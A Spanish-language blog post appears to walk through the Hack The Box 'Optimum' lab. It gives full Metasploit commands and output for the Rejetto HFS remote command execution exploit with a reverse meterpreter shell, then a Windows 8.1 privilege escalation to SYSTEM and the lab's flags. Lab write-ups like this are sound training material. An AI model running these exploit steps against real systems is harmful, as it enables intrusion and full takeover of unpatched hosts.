Ayer logre (con ayuda) terminar uno de los challenges aparentemente no debo publicar como lo hice, pero bueno, usen hydra.
En el dia dos atacare que ni idea de porque se llama asi…
1 probe
Si corren sparta lo único abierto es port 80 y muestra esa foto.
Si buscas la version “HttpFileServer version 2.3” la tercera opción de busqueda es un exploit de metaspolit que se llama CVE-2014-6287 Rejetto HttpFileServer Remote Command Execution. Suena precioso, asi que intentaremos usarlo.
root@kali:~# msfconsole msf > use exploit/windows/http/rejetto_hfs_exec msf exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8 rhost => 10.10.10.8 msf exploit(windows/http/rejetto_hfs_exec) > set lhost tun0 lhost => tun0 msf exploit(windows/http/rejetto_hfs_exec) >set payload windows/x64/meterpreter/reverse_tcp msf exploit(windows/http/rejetto_hfs_exec) > run [*] Started reverse TCP handler on 10.10.14.4:4444 [*] Using URL: http://0.0.0.0:8080/RJUTsUnzt3W9Hm [*] Local IP: http://192.168.133.135:8080/RJUTsUnzt3W9Hm [*] Server started. [*] Sending a malicious request to / [*] Payload request received: /RJUTsUnzt3W9Hm [*] Sending stage (179779 bytes) to 10.10.10.8 [*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.8:49394) at 2018-05-23 11:38:45 +0100 [!] Tried to delete %TEMP%\BzfeGAdmI.vbs, unknown result [*] Server stopped. meterpreter > dir Listing: C:\Users\kostas\Desktop ================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2018-05-29 20:36:15 +0100 %TEMP% 100666/rw-rw-rw- 282 fil 2017-03-18 11:57:16 +0000 desktop.ini 100777/rwxrwxrwx 760320 fil 2017-03-18 12:11:17 +0000 hfs.exe 100444/r--r--r-- 32 fil 2017-03-18 12:13:33 +0000 user.txt.txt meterpreter > cat user.txt.txt d0c39409d7b994a9a138meterpreter > background
y listo tenemos el usuario. 🙂
Ok, a partir de aqui se pone interesante porque lo que dice en los videos y lo que dice el walktrhough oficial no funciona.
Invetigando un poco llegué a http://www.hackingarticles.in/hack-the-box-challenge-optimum-walkthrough/ que me salvo la vida, en general se sale de metasploit y ataca el sistema operativo. En este caso es window 8.1
msf auxiliary(scanner/smb/smb_version) > sessions -i 4 [*] Starting interaction with 4... meterpreter > shell Process 2236 created. Channel 2 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>ver ver Microsoft Windows [Version 6.3.9600]
Ya sabiendo el sistema lo que necesitas es un local exploit que te permita escalar, en este caso:
Link: https://www.exploit-db.com/exploits/41020/ donde puedes bajar un exe que solo tienes que subir y executar.
meterpreter > upload '/root/Downloads/41020.exe' [*] uploading : /root/Downloads/41020.exe -> 41020.exe [*] uploaded : /root/Downloads/41020.exe -> 41020.exe meterpreter > shell Process 2360 created. Channel 5 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>whoami whoami optimum\kostas C:\Users\kostas\Desktop>41020.exe 41020.exe Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop> C:\Users\kostas\Desktop>whoami whoami nt authority\system
Y listo eres admin.
De ahi solo es cuestion de saber como leer textos en comand line.. ja… que yo no sabía y cat no sirve…
C:\Users\Administrator\Desktop>more root.txt more root.txt 51ed1b36553c8461f4 C:\Users\Administrator\Desktop>type root.txt type root.txt 51ed1b36553c8461f455 C:\Users\Administrator\Desktop>exit exit
Listo somos root y podemos ser felices.
Lo que aprendi
Bueno, esto ya lo sabía pero es particularmente doloroso, metasploit no siempre sirve, algunas veces es mejor atacar directamente el sistema operativo, sobretodo si es viejo como 8.1 windows.
use post/multi/recon/local_exploit_suggester